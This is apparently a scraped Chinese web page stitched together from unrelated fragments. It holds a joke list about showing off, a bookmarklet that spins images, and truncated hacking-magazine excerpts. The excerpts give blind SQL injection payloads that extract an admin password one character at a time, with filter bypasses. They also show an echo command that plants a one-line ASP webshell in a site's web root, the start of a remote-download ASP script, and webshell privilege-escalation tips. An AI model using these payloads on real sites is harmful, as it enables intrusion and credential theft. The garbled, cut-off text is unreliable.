论装逼

1、装逼之人必有牛逼之处，正如可怜之人必有可恨之处。

2、如果你第一波装的很成功的话，以后的就很自然了。即使不装，他们也会自然而然的认为你的确很牛逼。

3、遇见装逼者，你必须装的比他们更牛逼，遇强愈强。骗了一个人，你是骗子；骗了一个地方的人，你是成功人士；骗了一个国家，你就是领袖；骗了整个世界，你就是上帝！

4、装逼是不会被雷劈的，因为到处都有避雷针。

浏览器可以浏览网页，可以查看图片、视频，可以保存图片等等功能，但你可能没有想到或没有见到过下面这个功能：访问的页面中包含的图片元素围绕在一起有规律的旋转 ！

这是如何实现的呢？首先随便打开一个网站，随便一个网站都行！然后复制下面的代码到地址栏中，回车确定，看看发生了什么？
下面是代码！
复制内容到剪贴板代码:

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length;

经常在一些BBS里和一些杂志里看到,渗透XX网站，其实就是拿了扔了一个WEBSHELL在上面，严格来说这根本算不上渗透。因为当你进了XX内网面对N多的机器的时候，才知道，内网是多么的庞大。下面我们先来看两张内网的拓扑结构图，图1，图2所示。

作者：樱花浪子
本文已发表黑客手册,转载请注名版权                

　　时间过的真快，记得在07年1月份我写过一篇关于跨站添加管理员的文章，上期又给大家带来一期跨站的文章，小天对我那句话比较赞同，跨站的威力是不比注入小的，注入如果遇见SQL数据库还好说，
ACC的也就能老老实实猜密码，进后台，在利用后台某个功能得

举个例 子说一下，我们得到一个注入点：jmdcw.asp?name=aa'and 1=1 and ''='，如果替换其中的1=1为查询管理员的密码的语句：

(select asc(mid(pass,1,1)) from [name] where id=1)>49

如何用空格呢？其实可以写成这样的：

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))>49)and''='

如果屏蔽了<和>符号，则用between…and…，语句是：

jmdcw.asp?name=aa'and((select(asc(mid(pass,1,1)))from[name]where(id=1))between(40)and(50))a

在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符,既然它不允许我们进行提交,那我们可以采用下载的方法.这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中.好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","

在旁注过程中，可以执行cmd而权限又比较低的情况下，有时候可以用这个方法帮你拿下目标站。
命令格式
Echo 语句 >目标站绝对目录
例如：
echo ^<^%execute request("0")^%^> >D:\03389.com\wwwroot\YingMu.asp

这样访问目标站的目录下就会生成一个密码为0的asp的一句话，此方法在PHP等脚本语言均适用，大家灵活发挥

在一个风高黑夜的晚上

我突然想找几个小站练手

于是发生了以下对话

小新：丢几个网站给我。

尧子哥：什么网站。

小新：我练手。

然后尧子哥都不叼我了

我等了半天看他没反应，于是我就我准备小社工一把的！

小新：我拿你练手。

尧子哥：死开。

于是开始收集他的资料，请出百度大叔(

双人舞

无重力

在得到暸一個Webshell之後，如果能進一步利用系統的配置不當取得更高的權限，一直是廣大黑友們所津津樂道的話題，也是高手和菜鳥間最大的區別。本文將從一個大角度總括當前流行的各種提權方法，希望對大家有所啓發，起到一個抛磚引玉的作用

WEBSHELL權限提升技巧
c: d: e:.....
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這裏能不能跳轉，我們從這裏可以獲取好多有用的信息比如Serv-U的路徑，
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\